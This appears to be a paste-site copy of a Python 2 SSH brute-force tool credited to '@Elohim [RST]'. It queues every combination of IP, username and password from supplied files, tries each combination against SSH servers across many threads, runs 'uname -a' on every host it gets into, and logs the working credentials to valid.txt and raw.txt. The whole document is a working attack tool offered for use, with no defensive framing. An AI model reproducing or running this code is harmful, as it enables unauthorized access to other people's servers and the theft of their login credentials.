SHOW:
|
|
- or go back to the newest paste.
| 1 | import paramiko, sys, Queue, threading | |
| 2 | ||
| 3 | class SSHBrute(threading.Thread): | |
| 4 | def __init__(self, queue): | |
| 5 | threading.Thread.__init__(self) | |
| 6 | self.queue = queue | |
| 7 | def run(self): | |
| 8 | while True: | |
| 9 | ip,user,passwd = self.queue.get() | |
| 10 | self.kraken(ip,user,passwd) | |
| 11 | self.queue.task_done() | |
| 12 | ||
| 13 | def kraken(self,ip,user,passwd): | |
| 14 | try: | |
| 15 | if ip in cracked: return False | |
| 16 | ||
| 17 | if '%user%' in str(passwd): | |
| 18 | passwd = passwd.split("%")***91;0***93; + user + passwd.split("%")***91;2***93;
| |
| 19 | if '%User%' in str(passwd): | |
| 20 | pwd = user + passwd.split("%")***91;2***93;
| |
| 21 | passwd = passwd.split("%")***91;0***93;+pwd.title()
| |
| 22 | if str(passwd) == '%null%': | |
| 23 | passwd = '' | |
| 24 | ||
| 25 | ssh = paramiko.SSHClient() | |
| 26 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) | |
| 27 | ssh.connect(ip, username=user, password=passwd, timeout=35) | |
| 28 | raw.write(ip+' '+user+' '+passwd+'\n') | |
| 29 | raw.flush() | |
| 30 | chan = ssh.get_transport().open_session() | |
| 31 | chan.settimeout(35) | |
| 32 | chan.exec_command('uname -a')
| |
| 33 | data = chan.recv(1024) | |
| 34 | ||
| 35 | if len(data) == 0: | |
| 36 | nologs.write(ip+' '+user+' '+passwd+'\n') | |
| 37 | nologs.flush() | |
| 38 | return False | |
| 39 | ||
| 40 | val.write(ip+' '+user+' '+passwd+'|'+data.rstrip()+'\n') | |
| 41 | val.flush() | |
| 42 | cracked.append(ip) | |
| 43 | chan.close() | |
| 44 | ssh.close() | |
| 45 | return True | |
| 46 | except Exception, e: | |
| 47 | if 'uthent' in str(e): | |
| 48 | if dbg == 'bad': | |
| 49 | bad.write(ip+'\n') | |
| 50 | bad.flush() | |
| 51 | #print '\r***91;+***93;Tried '+ip+' '+user+' '+passwd+' ' | |
| 52 | ssh.close() | |
| 53 | return False | |
| 54 | #print ip, str(e) | |
| 55 | ssh.close() | |
| 56 | return False | |
| 57 | ||
| 58 | def brutemain(): | |
| 59 | if len(sys.argv) < 2: | |
| 60 | print """ | |
| 61 | SSH Brute Force Tool | |
| 62 | Author: @Elohim ***91;RST***93; | |
| 63 | Usage: | |
| 64 | bruter ThreadNumber IpFile UserFile PassFile FilterSwitch* | |
| 65 | *The filter Switch Takes Either the word "bad" or "no". | |
| 66 | If you supply the word bad, it filters in bad.txt only the ips | |
| 67 | which indeed support ssh AUTH and password didn't work""" | |
| 68 | return False | |
| 69 | ThreadNR = int(sys.argv***91;1***93;) | |
| 70 | queue = Queue.Queue(maxsize=20000) | |
| 71 | try: | |
| 72 | i = 0 | |
| 73 | for i in range(ThreadNR): | |
| 74 | t = SSHBrute(queue) | |
| 75 | t.daemon = True | |
| 76 | t.start() | |
| 77 | i += 1 | |
| 78 | except Exception, e: | |
| 79 | print 'Cant start more than',i,'Threads!' | |
| 80 | ||
| 81 | global bad | |
| 82 | global val | |
| 83 | global nologs | |
| 84 | global cracked | |
| 85 | global raw | |
| 86 | cracked = ***91;***93; | |
| 87 | bad = open('bad.txt','w')
| |
| 88 | val = open('valid.txt','a')
| |
| 89 | nologs = open('nologins.txt','a')
| |
| 90 | raw = open('raw.txt','a')
| |
| 91 | with open(str(sys.argv***91;2***93;),'rU') as ipf: ips = ipf.read().splitlines() | |
| 92 | with open(str(sys.argv***91;3***93;),'rU') as uf: users = uf.read().splitlines() | |
| 93 | with open(str(sys.argv***91;4***93;),'rU') as pf: passwords = pf.read().splitlines() | |
| 94 | global dbg | |
| 95 | dbg = str(sys.argv***91;5***93;) | |
| 96 | ||
| 97 | try: | |
| 98 | for password in passwords: | |
| 99 | for user in users: | |
| 100 | for ip in ips: | |
| 101 | queue.put((ip,user,password)) | |
| 102 | except: | |
| 103 | pass | |
| 104 | ||
| 105 | queue.join() | |
| 106 | ||
| 107 | if __name__ == "__main__": | |
| 108 | brutemain() |
